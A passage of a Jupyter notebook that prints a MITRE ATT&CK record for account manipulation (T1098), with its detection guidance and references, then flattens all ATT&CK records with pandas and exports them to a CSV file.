" 'technique_detection': 'Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)\\n\\nUse of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.',\n",
" 'tactic': ['credential-access', 'persistence'],\n",
" 'url': 'https://attack.mitre.org/techniques/T1098',\n",
" 'technique_id': 'T1098',\n",
" 'capec_id': None,\n",
" 'capec_url': None,\n",
" 'platform': ['Windows'],\n",
" 'data_sources': ['Authentication logs',\n",
" 'API monitoring',\n",
" 'Windows event logs',\n",
" 'Packet capture'],\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': ['Administrator'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': ['Tim MalcomVetter'],\n",
" 'technique_references': ['https://attack.mitre.org/techniques/T1098',\n",
" 'https://docs.microsoft.com/windows/device-security/auditing/event-4738',\n",
" 'https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM',\n",
" 'https://github.com/gentilkiwi/mimikatz/issues/92'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 27,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"all_attack_framework[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Showing schema of the results"
]
},
{
"cell_type": "code",
"execution_count": 28,
"metadata": {},
"outputs": [],
"source": [
"df = json_normalize(all_attack_framework)"
]
},
{
"cell_type": "code",
"execution_count": 29,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"['capec_id',\n",
" 'capec_url',\n",
" 'contributors',\n",
" 'created',\n",
" 'created_by_ref',\n",
" 'data_sources',\n",
" 'defense_bypassed',\n",
" 'detectable_by_common_defenses',\n",
" 'detectable_explanation',\n",
" 'difficulty_explanation',\n",
" 'difficulty_for_adversary',\n",
" 'effective_permissions',\n",
" 'group',\n",
" 'group_aliases',\n",
" 'group_description',\n",
" 'group_id',\n",
" 'group_references',\n",
" 'id',\n",
" 'matrix',\n",
" 'mitigation',\n",
" 'mitigation_description',\n",
" 'mitigation_references',\n",
" 'modified',\n",
" 'network_requirements',\n",
" 'object_marking_refs',\n",
" 'permissions_required',\n",
" 'platform',\n",
" 'relationship',\n",
" 'relationship_description',\n",
" 'relationship_id',\n",
" 'remote_support',\n",
" 'software',\n",
" 'software_aliases',\n",
" 'software_description',\n",
" 'software_id',\n",
" 'software_labels',\n",
" 'software_platform',\n",
" 'software_references',\n",
" 'software_url',\n",
" 'system_requirements',\n",
" 'tactic',\n",
" 'tactic_type',\n",
" 'target_object',\n",
" 'technique',\n",
" 'technique_description',\n",
" 'technique_detection',\n",
" 'technique_id',\n",
" 'technique_references',\n",
" 'type',\n",
" 'url']"
]
},
"execution_count": 29,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"list(df)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### We can then export All ATT&CK as a CSV file"
]
},
{
"cell_type": "code",
"execution_count": 30,
"metadata": {},
"outputs": [],
"source": [
"df = df[[\n",
" 'matrix','tactic','technique','technique_id','capec_id','capec_url','technique_description','technique_detection',\n",
" 'mitigation','mitigation_description','group','group_id','group_aliases','group_description','software',\n",
" 'software_id','software_description','software_labels','software_platform','relationship',\n",
" 'relationship_description','platform','data_sources','detectable_by_common_defenses','detectable_explanation',\n",
" 'difficulty_for_adversary','difficulty_explanation','effective_permissions','network_requirements',\n",
" 'permissions_required','remote_support','system_requirements','contributors','url','technique_references',\n",
" 'group_references','software_references']]"
]
},
{
"cell_type": "code",
"execution_count": 31,
"metadata": {},
"outputs": [],
"source": [
"df.to_csv('all_attack.csv',index=False,encoding='utf-8')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.6.5"
}
},
"nbformat": 4,
"nbformat_minor": 2
}